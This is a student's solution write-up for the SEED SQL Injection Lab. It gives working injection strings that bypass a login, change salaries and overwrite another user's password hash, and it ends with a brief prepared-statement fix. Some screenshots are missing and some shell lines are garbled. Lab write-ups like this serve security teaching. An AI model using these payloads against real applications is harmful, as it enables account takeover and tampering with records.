Solution of SEED SQL Injection Lab.
Lab Tasks
Task 1: Get Familiar with SQL Statements
$ mysql -uroot -pseedubuntu
mysql> show databases;
mysql> use Users;
mysql> show tables;
mysql> select * from credential where name = ‘Alice’;
Task 2.1: SQL Injection Attack from webpage.
Type “ admin’ # ” in the Username field and leave empty the password field
Task 2.2: SQL Injection Attack from command line.
Write Code on Terminator in Seed Lab:
$ curl '';
The Highlighted part shows the information of all the employees that is obtained through command line instruction.
Task 3.1: Modify your own salary.
As shown in the Edit Profile page, employees can only update their nicknames, emails, addresses, phone numbers, and passwords; they are not authorized to change their salaries. Assume that I am Alice. I want to increase my own salary by exploiting the SQL injection vulnerability in the Edit-Profile page. I know that salaries are stored in a column called salary.
I will use the statement in the Nickname field: ', Salary=10000 where name = ‘Alice’ #
Salary before statement:
Salary after statement:
Task 3.2: Modify other people’ salary.
I want to reduce Boby’s salary to 1 dollar.
Use statement in Alice’s profile editor: ', Salary=1 where name = ‘Boby’ #
Salary before statement:
Salary after statement:
Task 3.3: Modify other people’ password.
I want to change Boby’s password that I can log into his account and do further damage.
It uses SHA1 hash function to generate the hash value of password.
Use the following statement:
echo -n “tedwashere” | sha1sum
Copy the code you get and paste in Alice’s profile editor as the following statement:
', password=(code you copied) where name = ‘Boby’ #
Boby’s password before Statement:
Boby’s password after Statement:
Task 4: Countermeasure — Prepared Statement.
seed@VM:-$ /var/www/SQLInjection/ bash: /var/www/SQL Injection/: Is a directory seed@VM:-$ cd /var/www/SQLInjection/
seed@VM: .../SQLInjections ls
seed@VM:.../SQLInjections subl safe_home.php
seed@VM:.../SQLInjection$ subl unsafe_home.php
After exicute these codes copy the code from line 72 to 80 in SAFE_HOME_PHP and paste over the line 73 to 80 in UNSAFE_HOME_PHP file. Also remove the extra unnecessary code from 81 to 100 in UNSAFE_HOME_PHP file. Then save the code file.
After saving, Run these codes in terminal.
[10/30/21] seed@VM: .../SOLInjection$ cd ..
[10/30/21] seed@VM:.../www$ cd..
[10/30/21] seed@VM:/var$ cd
[10/30/21] 11seed@VM:/$ sudo service apache2 reset